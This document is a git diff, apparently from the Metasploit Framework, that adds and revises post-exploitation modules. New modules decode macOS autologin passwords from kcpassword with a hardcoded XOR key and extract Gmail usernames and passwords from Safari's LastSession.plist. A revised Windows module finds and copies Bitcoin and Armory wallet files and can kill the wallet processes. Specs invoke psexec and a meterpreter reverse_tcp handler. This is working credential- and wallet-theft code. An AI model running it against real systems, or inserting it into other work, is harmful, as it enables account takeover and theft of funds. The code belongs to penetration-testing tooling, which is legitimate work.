initialize(info={}) super( update_info( info, - 'Name' => 'Multi Manage Youtube Broadcast', + 'Name' => 'Multi Manage YouTube Broadcast', 'Description' => %q{ - This module will broadcast a Youtube video on all compromised systems. It will play + This module will broadcast a YouTube video on specified compromised systems. It will play the video in the target machine's native browser in full screen mode. The VID datastore - option is the "v" parameter in your Youtube video's URL. + option is the "v" parameter in a YouTube video's URL. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post register_options( [ - OptString.new('VID', [true, 'The video ID to the Youtube video']) + OptString.new('VID', [true, 'The video ID to the YouTube video']) ], self.class) end @@ -70,6 +70,7 @@ class Metasploit3 < Msf::Post # # The Linux version uses Firefox + # TODO: Try xdg-open? # def linux_start_video(id) begin @@ -92,7 +93,7 @@ class Metasploit3 < Msf::Post rescue EOFError return false end - + true end diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb new file mode 100644 index 0000000000..25f14542f4 --- /dev/null +++ b/modules/post/osx/gather/autologin_password.rb @@ -0,0 +1,83 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Post + include Msf::Post::File + + # extract/verify by by XORing your kcpassword with your password + AUTOLOGIN_XOR_KEY = [0x7D, 0x89, 0x52, 0x23, 0xD2, 0xBC, 0xDD, 0xEA, 0xA3, 0xB9, 0x1F] + + def initialize(info={}) + super(update_info(info, + 'Name' => 'OSX Gather Autologin Password as Root', + 'Description' => %q{ + This module will steal the plaintext password of any user on the machine + with autologin enabled. Root access is required. + + When a user has autologin enabled (System Preferences -> Accounts), OSX + stores their password with an XOR encoding in /private/etc/kcpassword. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'joev' ], + 'Platform' => [ 'osx' ], + 'References' => [ + ['URL', 'http://www.brock-family.org/gavin/perl/kcpassword.html'] + ], + 'SessionTypes' => [ 'shell' ] + )) + + register_advanced_options([ + OptString.new('KCPASSWORD_PATH', [true, 'Path to kcpassword file', '/private/etc/kcpassword']) + ], self.class) + end + + def run + # ensure the user is root (or can read the kcpassword) + unless user == 'root' + fail_with(Failure::NoAccess, "Root privileges are required to read kcpassword file") + end + + # read the autologin account from prefs plist + read_cmd = "defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser username" + autouser = cmd_exec("/bin/sh -c '#{read_cmd} 2> /dev/null'") + + if autouser.present? + print_status "User #{autouser} has autologin enabled, decoding password..." + else + fail_with(Failure::NotVulnerable, "No users on this machine have autologin enabled") + end + + # kcpass contains the XOR'd bytes + kcpass = read_file(kcpassword_path) + key = AUTOLOGIN_XOR_KEY + + # decoding routine, slices into 11 byte chunks and XOR's each chunk + decoded = kcpass.bytes.to_a.each_slice(key.length).map do |kc| + kc.each_with_index.map { |byte, idx| byte ^ key[idx] }.map(&:chr).join + end.join.sub(/\x00.*$/, '') + + # save in the database + report_auth_info( + :host => session.session_host, + :sname => 'login', + :user => autouser, + :pass => decoded, + :active => true + ) + print_good "Decoded autologin password: #{autouser}:#{decoded}" + end + + private + + def kcpassword_path + datastore['KCPASSWORD_PATH'] + end + + def user + @user ||= cmd_exec('whoami').chomp + end +end diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 7f8ecc7080..85f389f207 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -57,19 +57,19 @@ class Metasploit3 < Msf::Post # on 10.8+ ShadowHashData stores a binary plist inside of the user.plist # Here we pull out the binary plist bytes and use built-in plutil to convert to xml plist_bytes = shadow_bytes.split('').each_slice(2).map{|s| "\\x#{s[0]}#{s[1]}"}.join - + # encode the bytes as \x hex string, print using bash's echo, and pass to plutil shadow_plist = cmd_exec("/bin/bash -c 'echo -ne \"#{plist_bytes}\" | plutil -convert xml1 - -o -'") - + # read the plaintext xml shadow_xml = REXML::Document.new(shadow_plist) - + # parse out the different parts of sha512pbkdf2 dict = shadow_xml.elements[1].elements[1].elements[2] entropy = Rex::Text.to_hex(dict.elements[2].text.gsub(/\s+/, '').unpack('m*')[0], '') iterations = dict.elements[4].text.gsub(/\s+/, '') salt = Rex::Text.to_hex(dict.elements[6].text.gsub(/\s+/, '').unpack('m*')[0], '') - + # PBKDF2 stored in format decoded_hash = "#{user}:$ml$#{iterations}$#{salt}$#{entropy}" print_good "SHA512:#{decoded_hash}" @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Post def lte_tiger? ver_num =~ /10\.(\d+)/ and $1.to_i <= 4 end - + # parse the dslocal plist in lion def read_ds_xml_plist(plist_content) doc = REXML::Document.new(plist_content) diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb new file mode 100644 index 0000000000..b1ce88251a --- /dev/null +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -0,0 +1,224 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Post + + include Msf::Post::File + + def initialize(info={}) + super( update_info( info, + 'Name' => 'OSX Gather Safari LastSession.plist', + 'Description' => %q{ + This module downloads the LastSession.plist file from the target machine. + LastSession.plist is used by Safari to track active websites in the current session, + and sometimes contains sensitive information such as usernames and passwords. + + This module will first download the original LastSession.plist, and then attempt + to find the credential for Gmail. The Gmail's last session state may contain the + user's credential if his/her first login attempt failed (likely due to a typo), + and then the page got refreshed or another login attempt was made. This also means + the stolen credential might contains typos. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r'], + 'Platform' => [ 'osx' ], + 'SessionTypes' => [ 'shell' ], + 'References' => + [ + ['URL', 'http://www.securelist.com/en/blog/8168/Loophole_in_Safari'] + ] + )) + end + + + # + # Returns the Safari version based on version.plist + # @return [String] The Safari version. If not found, returns '' + # + def get_safari_version + vprint_status("#{peer} - Checking Safari version.") + version = '' + + f = read_file("/Applications/Safari.app/Contents/version.plist") + xml = REXML::Document.new(f) rescue nil + return version if xml.nil? + + xml.elements['plist/dict'].each_element do |e| + if e.text == 'CFBundleShortVersionString' + version = e.next_element.text + break + end + end + + version + end + + def peer + "#{session.session_host}:#{session.session_port}" + end + + + # + # Converts LastSession.plist to xml, and then read it + # @param filename [String] The path to LastSession.plist + # @return [String] Returns the XML version of LastSession.plist + # + def plutil(filename) + cmd_exec("plutil -convert xml1 #{filename}") + read_file(filename) + end + + + # + # Returns the XML version of LastSession.plist (text file) + # Just a wrapper for plutil + # + def get_lastsession + print_status("#{peer} - Looking for LastSession.plist") + plutil("#{expand_path("~")}/Library/Safari/LastSession.plist") + end + + + # + # Returns the element that contains session data + # @param lastsession [String] XML data + # @return [REXML::Element] The Array element for the session data + # + def get_sessions(lastsession) + session_dict = nil + + xml = REXML::Document.new(lastsession) rescue nil + return nil if xml.nil? + + xml.elements['plist'].each_element do |e| + found = false + e.elements.each do |e2| + if e2.text == 'SessionWindows' + session_dict = e.elements['array'] + found = true + break + end + end + + break if found + end + + session_dict + end + + + # + # Returns the session element + # @param xml [REXML::Element] The array element for the session data + # @param domain [Regexp] The domain to search for + # @return [REXML::Element] The element for the session data + # + def get_session_element(xml, domain_regx) + dict = nil + + found = false + xml.each_element do |e| + e.elements['array/dict'].each_element do |e2| + if e2.text =~ domain_regx + dict = e + found = true + break + end + end + + break if found + end + + dict + end + + + # + # Extracts Gmail username/password + # @param xml [REXML::Element] The array element for the session data + # @return [Array] [0] is the domain, [1] is the user, [2] is the pass + # + def find_gmail_cred(xml) + vprint_status("#{peer} - Looking for username/password for Gmail.") + gmail_dict = get_session_element(xml, /(mail|accounts)\.google\.com/) + return '' if gmail_dict.nil? + + raw_data = gmail_dict.elements['array/dict/data'].text + decoded_data = Rex::Text.decode_base64(raw_data) + cred = decoded_data.scan(/Email=(.+)&Passwd=(.+)\&signIn/).flatten + user, pass = cred.map {|data| Rex::Text.uri_decode(data)} + + return '' if user.blank? or pass.blank? + + ['mail.google.com', user, pass] + end + + # + # Runs the module + # + def run + cred_tbl = Rex::Ui::Text::Table.new({ + 'Header' => 'Credentials', + 'Indent' => 1, + 'Columns' => ['Domain', 'Username', 'Password'] + }) + + # + # Downloads LastSession.plist in XML format + # + lastsession = get_lastsession + if lastsession.blank? + print_error("#{peer} - LastSession.plist not found") + return + else + p = store_loot('osx.lastsession.plist', 'text/plain', session, lastsession, 'LastSession.plist.xml') + print_good("#{peer} - LastSession.plist stored in: #{p.to_s}") + end + + # + # If this is an unpatched version, we try to extract creds + # +=begin + version = get_safari_version + if version.blank? + print_warning("Unable to determine Safari version, will try to extract creds anyway") + elsif version >= "6.1" + print_status("#{peer} - This machine no longer stores session data in plain text") + return + else + vprint_status("#{peer} - Safari version: #{version}") + end +=end + + # + # Attempts to convert the XML file to an actual XML object, with the element + # holding our session data + # + lastsession_xml = get_sessions(lastsession) + unless lastsession_xml + print_error("Cannot read XML file, or unable to find any session data") + return + end + + # + # Look for credential in the session data. + # I don't know who else stores their user/pass in the session data, but I accept pull requests. + # Already looked at hotmail, yahoo, and twitter + # + gmail_cred = find_gmail_cred(lastsession_xml) + cred_tbl << gmail_cred unless gmail_cred.blank? + + unless cred_tbl.rows.empty? + p = store_loot('osx.lastsession.creds', 'text/plain', session, cred_tbl.to_csv, 'LastSession_creds.txt') + print_good("#{peer} - Found credential saved in: #{p}") + print_line + print_line(cred_tbl.to_s) + end + end + +end diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb index 790cf03ec6..a740c6c0da 100644 --- a/modules/post/windows/gather/bitcoin_jacker.rb +++ b/modules/post/windows/gather/bitcoin_jacker.rb @@ -15,63 +15,99 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Gather Bitcoin wallet.dat', + 'Name' => 'Windows Gather Bitcoin Wallet', 'Description' => %q{ - This module downloads any Bitcoin wallet.dat files from the target system + This module downloads any Bitcoin wallet files from the target + system. It currently supports both the classic Satoshi wallet and the + more recent Armory wallets. Note that Satoshi wallets tend to be + unencrypted by default, while Armory wallets tend to be encrypted by default. }, 'License' => MSF_LICENSE, - 'Author' => [ 'illwill '], - 'Platform' => [ 'win' ], + 'Author' => [ + 'illwill ', # Original implementation + 'todb' # Added Armory support + ], + 'Platform' => [ 'win' ], # TODO: Several more platforms host Bitcoin wallets... 'SessionTypes' => [ 'meterpreter' ] )) + + register_options([ + OptBool.new('KILL_PROCESSES', [false, 'Kill associated Bitcoin processes before jacking.', false]), + ], self.class) end def run - print_status("Checking All Users For Bitcoin Wallet...") + print_status("Checking all user profiles for Bitcoin wallets...") + found_wallets = false grab_user_profiles().each do |user| - next if user['AppData'] == nil - tmpath= user['AppData'] + "\\Bitcoin\\wallet.dat" - jack_wallet(tmpath) + next unless user['AppData'] + bitcoin_wallet_path = user['AppData'] + "\\Bitcoin\\wallet.dat" + next unless file?(bitcoin_wallet_path) + found_wallets = true + jack_wallet(bitcoin_wallet_path) + armory_wallet_path = user['AppData'] + "\\Armory" + session.fs.dir.foreach(armory_wallet_path) do |fname| + next unless fname =~ /\.wallet/ + found_wallets = true + armory_wallet_fullpath = armory_wallet_path + "\\#{fname}" + jack_wallet(armory_wallet_fullpath) + end + end + unless found_wallets + print_warning "No wallets found, nothing to do." end end - def jack_wallet(filename) - data = "" - return if not file?(filename) + def jack_wallet(wallet_path) + data = "" + wallet_type = case wallet_path + when /\.wallet$/ + :armory + when /wallet\.dat$/ + :satoshi + else + :unknown + end - print_status("Wallet Found At #{filename}") - print_status(" Jackin their wallet...") + if wallet_type == :unknown + print_error "Unknown wallet type: #{wallet_path}, nothing to do." + return + end - kill_bitcoin + print_status("#{wallet_type.to_s.capitalize} Wallet found at #{wallet_path}") + print_status("Jackin' wallet...") + + kill_bitcoin_processes if datastore['KILL_PROCESSES'] begin - data = read_file(filename) || '' + data = read_file(wallet_path) || '' rescue ::Exception => e - print_error("Failed to download #{filename}: #{e.class} #{e}") + print_error("Failed to download #{wallet_path}: #{e.class} #{e}") return end if data.empty? - print_error(" No data found") + print_error("No data found, nothing to save.") else - p = store_loot( - "bitcoin.wallet", + loot_result = store_loot( + "bitcoin.wallet.#{wallet_type}", "application/octet-stream", session, data, - filename, - "Bitcoin Wallet" + wallet_path, + "Bitcoin Wallet (#{wallet_type.to_s.capitalize})" ) - print_status(" Wallet Jacked: #{p.to_s}") + print_status("Wallet jacked: #{loot_result}") end end - def kill_bitcoin - client.sys.process.get_processes().each do |x| - if x['name'].downcase == "bitcoin.exe" - print_status(" #{x['name']} Process Found...") - print_status(" Killing Process ID #{x['pid']}...") - session.sys.process.kill(x['pid']) rescue nil + def kill_bitcoin_processes + client.sys.process.get_processes().each do |process| + pname = process['name'].downcase + if pname == "bitcoin.exe" || pname == "bitcoind.exe" || pname == "armoryqt.exe" + print_status("#{process['name']} Process Found...") + print_status("Killing Process ID #{process['pid']}...") + session.sys.process.kill(process['pid']) end end end diff --git a/modules/post/windows/gather/credentials/sso.rb b/modules/post/windows/gather/credentials/sso.rb index 22572c3f95..4f5b27cd9c 100644 --- a/modules/post/windows/gather/credentials/sso.rb +++ b/modules/post/windows/gather/credentials/sso.rb @@ -99,6 +99,7 @@ class Metasploit3 < Msf::Post def report_creds(domain, user, pass) return if (user.empty? or pass.empty?) + return if pass.include?("n.a.") if session.db_record source_id = session.db_record.id diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index cbc121bc6e..81ca4376a6 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -3,10 +3,10 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +require 'msf/core' +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry @@ -15,12 +15,13 @@ class Metasploit3 < Msf::Post super(update_info(info, 'Name' => 'Windows Gather Prefetch File Information', 'Description' => %q{ - This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems. - Run count, hash and filename information is collected from each prefetch file while - Last Modified and Create times are file MACE values. + This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems + and current values of related registry keys. From each prefetch file we'll collect + filetime (converted to utc) of the last execution, file path hash, run count, filename + and the execution path. }, 'License' => MSF_LICENSE, - 'Author' => ['TJ Glad '], + 'Author' => ['TJ Glad '], 'Platform' => ['win'], 'SessionType' => ['meterpreter'] )) @@ -43,7 +44,7 @@ class Metasploit3 < Msf::Post end def print_timezone_key_values(key_value) - # Looks for timezone from registry + # Looks for timezone information from registry. timezone = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", key_value) tz_bias = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", "Bias") if timezone.nil? or tz_bias.nil? @@ -60,36 +61,69 @@ class Metasploit3 < Msf::Post end end - def gather_pf_info(name_offset, hash_offset, runcount_offset, filename) - # We'll load the file and parse information from the offsets + def gather_pf_info(name_offset, hash_offset, runcount_offset, filetime_offset, filename) + # Collects the desired information from each prefetch file found + # from the system. + prefetch_file = read_file(filename) - if prefetch_file.empty? or prefetch_file.nil? + if prefetch_file.blank? print_error("Couldn't read file: #{filename}") return nil else - # First we'll get the filename - pf_filename = prefetch_file[name_offset..name_offset+60] + # First we extract the saved filename + pf_filename = prefetch_file[name_offset, 60] idx = pf_filename.index("\x00\x00") name = Rex::Text.to_ascii(pf_filename.slice(0..idx)) - # Next we'll get the run count - run_count = prefetch_file[runcount_offset..runcount_offset+4].unpack('L*')[0].to_s - # Then file path hash - path_hash = prefetch_file[hash_offset..hash_offset+4].unpack('h8')[0].reverse.upcase.to_s - # Last is mace value for timestamps - mtimes = client.priv.fs.get_file_mace(filename) - if mtimes.nil? or mtimes.empty? - last_modified = "Error reading value" - created = "Error reading value" - else - last_modified = mtimes['Modified'].utc.to_s - created = mtimes['Created'].utc.to_s + + # Then we get the runcount + run_count = prefetch_file[runcount_offset, 4].unpack('v')[0] + + # Then the filepath hash + path_hash = prefetch_file[hash_offset, 4].unpack('h*')[0].upcase.reverse + + # Last we get the latest execution time + filetime_a = prefetch_file[filetime_offset, 16].unpack('q*') + filetime = filetime_a[0] + filetime_a[1] + last_exec = Time.at((filetime - 116444736000000000) / 10000000).utc.to_s + + # This is for reading file paths of the executable from + # the prefetch file. We'll use this to find out from where the + # file was executed. + + # First we'll use specific offsets for finding out the location + # and length of the filepath so that we can find it. + filepath = [] + fpath_offset = prefetch_file[0x64, 2].unpack('v').first + fpath_length = prefetch_file[0x68, 2].unpack('v').first + filepath_data = prefetch_file[fpath_offset, fpath_length] + + # This part will extract the filepath so that we can find and + # compare its contents to the filename we found previously. This + # allows us to find the filepath (if it can be found inside the + # prefetch file) used to execute the program + # referenced in the prefetch-file. + unless filepath_data.blank? + fpath_data_array = filepath_data.split("\\\x00D\x00E\x00V\x00I\x00C\x00E") + fpath_data_array.each do |path| + unless path.blank? + fpath_name = path.split("\\").last.gsub(/\0/, '') + if fpath_name == name + filepath << path + end + end + end end - return [last_modified, created, run_count, path_hash, name] end + if filepath.blank? + filepath << "*** Filepath not found ***" + end + + return [last_exec, path_hash, run_count, name, filepath[0]] end def run print_status("Prefetch Gathering started.") + # Check to see what Windows Version is running. # Needed for offsets. # Tested on WinXP, Win2k3 and Win7 systems. @@ -100,18 +134,18 @@ class Metasploit3 < Msf::Post error_msg = "You don't have enough privileges. Try getsystem." if sysnfo =~/(Windows XP|2003|.NET)/ - # For some reason we need system privileges to read file - # mace time on XP/2003 while we can do the same only - # as admin on Win7. - if not is_system? + + if not is_admin? print_error(error_msg) return nil end + # Offsets for WinXP & Win2k3 print_good("Detected #{sysnfo} (max 128 entries)") name_offset = 0x10 hash_offset = 0x4C runcount_offset = 0x90 + filetime_offset = 0x78 # Registry key for timezone key_value = "StandardName" @@ -120,14 +154,15 @@ class Metasploit3 < Msf::Post print_error(error_msg) return nil end + # Offsets for Win7 print_good("Detected #{sysnfo} (max 128 entries)") name_offset = 0x10 hash_offset = 0x4C runcount_offset = 0x98 + filetime_offset = 0x78 # Registry key for timezone key_value = "TimeZoneKeyName" - else print_error("No offsets for the target Windows version. Currently works only on WinXP, Win2k3 and Win7.") return nil @@ -138,12 +173,13 @@ class Metasploit3 < Msf::Post 'Indent' => 1, 'Columns' => [ - "Modified (mace)", - "Created (mace)", + "Last execution (filetime)", "Run Count", "Hash", - "Filename" + "Filename", + "Filepath" ]) + print_prefetch_key_value print_timezone_key_values(key_value) print_good("Current UTC Time: %s" % Time.now.utc) @@ -165,7 +201,7 @@ class Metasploit3 < Msf::Post next else filename = ::File.join(file['path'], file['name']) - pf_entry = gather_pf_info(name_offset, hash_offset, runcount_offset, filename) + pf_entry = gather_pf_info(name_offset, hash_offset, runcount_offset, filetime_offset, filename) if not pf_entry.nil? table << pf_entry end diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb index aef00af5d9..8b3c9f2862 100644 --- a/modules/post/windows/manage/ie_proxypac.rb +++ b/modules/post/windows/manage/ie_proxypac.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Manage Proxy PAC File', 'Description' => %q{ This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC - option, a PAC file will be created in the victim host. It's also possible to provide a + option, a PAC file will be created on the victim host. It's also possible to provide a remote PAC file (REMOTE_PAC option) by providing the full URL. }, 'License' => MSF_LICENSE, diff --git a/msfbinscan b/msfbinscan index e9fe1dff76..72d403ad77 100755 --- a/msfbinscan +++ b/msfbinscan @@ -112,7 +112,7 @@ opt.on('-I', '--image-base [address]', 'Specify an alternate ImageBase param['imagebase'] = opt2i(t) end -opt.on('-D', '--disasm', 'Disassemble the bytes at this address [PE]') do |t| +opt.on('-D', '--disasm', 'Disassemble the bytes at this address [PE|ELF]') do |t| param['disasm'] = true end diff --git a/msfcli b/msfcli index fb346c1ca8..ee81c889bc 100755 --- a/msfcli +++ b/msfcli @@ -312,6 +312,8 @@ class Msfcli modules[:module] = @framework.exploits.create($1) elsif module_name =~ /auxiliary\/(.*)/ modules[:module] = @framework.auxiliary.create($1) + elsif module_name =~ /post\/(.*)/ + modules[:module] = @framework.post.create($1) else modules[:module] = @framework.exploits.create(module_name) if modules[:module].nil? diff --git a/msfelfscan b/msfelfscan index fcbe9eeb35..4651b2b6ae 100755 --- a/msfelfscan +++ b/msfelfscan @@ -82,6 +82,10 @@ opt.on('-B', '--before [bytes]', 'Number of bytes to show before match (-a/-b)') param['before'] = opt2i(t) end +opt.on('-D', '--disasm', 'Disassemble the bytes at this address') do |t| + param['disasm'] = true +end + opt.on('-I', '--image-base [address]', 'Specify an alternate ImageBase') do |t| param['imagebase'] = opt2i(t) end diff --git a/msfvenom b/msfvenom index 1fe9e13c18..ae4ac54e77 100755 --- a/msfvenom +++ b/msfvenom @@ -461,8 +461,6 @@ class MsfVenom exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts) if (!exe && payload.respond_to?(:generate_war)) exe = payload.generate_war.pack - else - exe = ::Msf::Util::EXE.to_jsp_war(exe) end @out.write exe diff --git a/scripts/shell/spawn_meterpreter.rb b/scripts/shell/spawn_meterpreter.rb index a9a0f0f4bd..d45e9d4ac4 100644 --- a/scripts/shell/spawn_meterpreter.rb +++ b/scripts/shell/spawn_meterpreter.rb @@ -85,7 +85,7 @@ begin end opts = { :linemax => linemax, - :decoder => File.join(Msf::Config.data_directory, "data", "exploits", "cmdstager", "vbs_b64"), + :decoder => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64"), #:nodelete => true # keep temp files (for debugging) } exe = Msf::Util::EXE.to_executable(framework, larch, lplat, buf) diff --git a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb index f6a4cd13e0..53d4b035a7 100644 --- a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb +++ b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb @@ -64,19 +64,69 @@ describe Msf::Exploit::Remote::BrowserExploitServer do end describe ".get_bad_requirements" do - it "should not contain any bad requirements" do - server.get_bad_requirements(expected_profile).should eq([]) + let(:rejected_requirements) do + server.get_bad_requirements(fake_profile) end - it "should have identify :os_name as a requirement not met" do - fake_profile = { - "rMWwSAwBHLoESpHbEGbsv" => { - :os_name => expected_os_name - }} + context 'when given the expected profile' do + it "should not contain any bad requirements" do + server.get_bad_requirements(expected_profile).should eq([]) + end + end - server.instance_variable_set(:@requirements, {:os_name => /win/i}) - baddies = server.get_bad_requirements(fake_profile) - baddies.should eq([:os_name]) + context 'when attempting to match :os_name' do + let(:fake_profile) do + { :os_name => expected_os_name } + end + + before do + server.instance_variable_set(:@requirements, {:os_name => /win/i}) + end + + it "should have identify :os_name as a requirement not met" do + rejected_requirements.should eq([:os_name]) + end + end + + context 'when attempting to match :ua_ver' do + context 'against version 25.0' do + let(:expected_ua_ver) { '25.0' } + let(:fake_profile) do + { :ua_ver => expected_ua_ver } + end + + before do + server.instance_variable_set(:@requirements, {:ua_ver => ua_ver}) + end + + context "with the regex /26\.0$/" do + let(:ua_ver) { /26\.0$/ } + it "should reject :ua_ver" do + rejected_requirements.should include(:ua_ver) + end + end + + context "with the regex /25\.0$/" do + let(:ua_ver) { /25\.0$/ } + it "should accept :ua_ver" do + rejected_requirements.should_not include(:ua_ver) + end + end + + context "with a Proc that checks if version is between 1-5" do + let(:ua_ver) { lambda{ |ver| ver.to_i.between?(1, 5) } } + it "should reject :ua_ver" do + rejected_requirements.should include(:ua_ver) + end + end + + context "with a Proc that checks if version is between 20-26" do + let(:ua_ver) { lambda{ |ver| ver.to_i.between?(20, 26) } } + it "should accept :ua_ver" do + rejected_requirements.should_not include(:ua_ver) + end + end + end end end diff --git a/spec/msfcli_spec.rb b/spec/msfcli_spec.rb index 4cc5a988ec..d2133b28ff 100644 --- a/spec/msfcli_spec.rb +++ b/spec/msfcli_spec.rb @@ -222,6 +222,37 @@ describe Msfcli do end context ".init_modules" do + + it "should inititalize an exploit module" do + args = 'exploit/windows/smb/psexec S' + m = '' + stdout = get_stdout { + cli = Msfcli.new(args.split(' ')) + m = cli.init_modules + } + m[:module].class.to_s.should start_with("Msf::Modules::Mod") + end + + it "should inititalize an auxiliary module" do + args = 'auxiliary/server/browser_autopwn S' + m = '' + stdout = get_stdout { + cli = Msfcli.new(args.split(' ')) + m = cli.init_modules + } + m[:module].class.to_s.should start_with("Msf::Modules::Mod") + end + + it "should inititalize a post module" do + args = 'post/windows/gather/credentials/gpp S' + m = '' + stdout = get_stdout { + cli = Msfcli.new(args.split(' ')) + m = cli.init_modules + } + m[:module].class.to_s.should start_with("Msf::Modules::Mod") + end + it "should have multi/handler module initialized" do args = "multi/handler payload=windows/meterpreter/reverse_tcp lhost=127.0.0.1 E" m = '' @@ -384,4 +415,4 @@ describe Msfcli do end end -end \ No newline at end of file +end diff --git a/spec/support/shared/contexts/msf/util/exe.rb b/spec/support/shared/contexts/msf/util/exe.rb index 9b86fe33c6..e1372a6492 100644 --- a/spec/support/shared/contexts/msf/util/exe.rb +++ b/spec/support/shared/contexts/msf/util/exe.rb @@ -36,8 +36,8 @@ shared_context 'Msf::Util::Exe' do { :format => "psh", :arch => "x86_64", :file_fp => /ASCII/ }, { :format => "psh-net", :arch => "x86", :file_fp => /ASCII/ }, { :format => "psh-net", :arch => "x86_64", :file_fp => /ASCII/ }, - { :format => "war", :arch => "x86", :file_fp => /Zip/ }, - { :format => "war", :arch => "x86_64", :file_fp => /Zip/ }, + { :format => "war", :arch => "x86", :file_fp => /zip/i }, + { :format => "war", :arch => "x86_64", :file_fp => /zip/i }, { :format => "msi", :arch => "x86", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, { :format => "msi", :arch => "x64", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, { :format => "msi", :arch => "x86_64", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, @@ -51,29 +51,29 @@ shared_context 'Msf::Util::Exe' do { :format => "elf", :arch => "armle", :file_fp => /ELF 32.*ARM/ }, { :format => "elf", :arch => "mipsbe", :file_fp => /ELF 32-bit MSB executable, MIPS/ }, { :format => "elf", :arch => "mipsle", :file_fp => /ELF 32-bit LSB executable, MIPS/ }, - { :format => "war", :arch => "x86", :file_fp => /Zip/ }, - { :format => "war", :arch => "x64", :file_fp => /Zip/ }, - { :format => "war", :arch => "armle", :file_fp => /Zip/ }, - { :format => "war", :arch => "mipsbe", :file_fp => /Zip/ }, - { :format => "war", :arch => "mipsle", :file_fp => /Zip/ }, + { :format => "war", :arch => "x86", :file_fp => /zip/i }, + { :format => "war", :arch => "x64", :file_fp => /zip/i }, + { :format => "war", :arch => "armle", :file_fp => /zip/i }, + { :format => "war", :arch => "mipsbe", :file_fp => /zip/i }, + { :format => "war", :arch => "mipsle", :file_fp => /zip/i }, ], "bsd" => [ { :format => "elf", :arch => "x86", :file_fp => /ELF 32.*BSD/ }, - { :format => "war", :arch => "x86", :file_fp => /Zip/ }, + { :format => "war", :arch => "x86", :file_fp => /zip/i }, ], "solaris" => [ { :format => "elf", :arch => "x86", :file_fp => /ELF 32/ }, - { :format => "war", :arch => "x86", :file_fp => /Zip/ }, + { :format => "war", :arch => "x86", :file_fp => /zip/i }, ], "osx" => [ { :format => "macho", :arch => "x86", :file_fp => /Mach-O.*i386/ }, { :format => "macho", :arch => "x64", :file_fp => /Mach-O 64/ }, { :format => "macho", :arch => "armle", :file_fp => /Mach-O.*(acorn|arm)/ }, { :format => "macho", :arch => "ppc", :file_fp => /Mach-O.*ppc/ }, - { :format => "war", :arch => "x86", :file_fp => /Zip/ }, - { :format => "war", :arch => "x64", :file_fp => /Zip/ }, - { :format => "war", :arch => "armle", :file_fp => /Zip/ }, - { :format => "war", :arch => "ppc", :file_fp => /Zip/ }, + { :format => "war", :arch => "x86", :file_fp => /zip/i }, + { :format => "war", :arch => "x64", :file_fp => /zip/i }, + { :format => "war", :arch => "armle", :file_fp => /zip/i }, + { :format => "war", :arch => "ppc", :file_fp => /zip/i }, ], } diff --git a/spec/tools/cpassword_decrypt_spec.rb b/spec/tools/cpassword_decrypt_spec.rb new file mode 100644 index 0000000000..addf839222 --- /dev/null +++ b/spec/tools/cpassword_decrypt_spec.rb @@ -0,0 +1,31 @@ +require 'spec_helper' + +load Metasploit::Framework.root.join('tools/cpassword_decrypt.rb').to_path + +require 'fastlib' +require 'msfenv' +require 'msf/base' + +describe CPassword do + context "Class methods" do + let(:cpasswd) do + CPassword.new + end + + context ".decrypt" do + it "should return the decrypted password as 'testpassword'" do + # Encrypted password for "testpassword" + cpass = "AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk" + pass = cpasswd.decrypt(cpass) + pass.should eq('testpassword') + end + + it "should return an empty string due to a bad password" do + # Invalid password format + cpass = "BadPassword" + pass = cpasswd.decrypt(cpass) + pass.should eq('') + end + end + end +end \ No newline at end of file diff --git a/test/modules/auxiliary/test/httpserver.rb b/test/modules/auxiliary/test/httpserver.rb index 6e4d8ea39c..b40819d862 100644 --- a/test/modules/auxiliary/test/httpserver.rb +++ b/test/modules/auxiliary/test/httpserver.rb @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary end =begin - + Test Results - clinet output: msf auxiliary(cisco_asa_asdm) > run @@ -149,6 +149,5 @@ 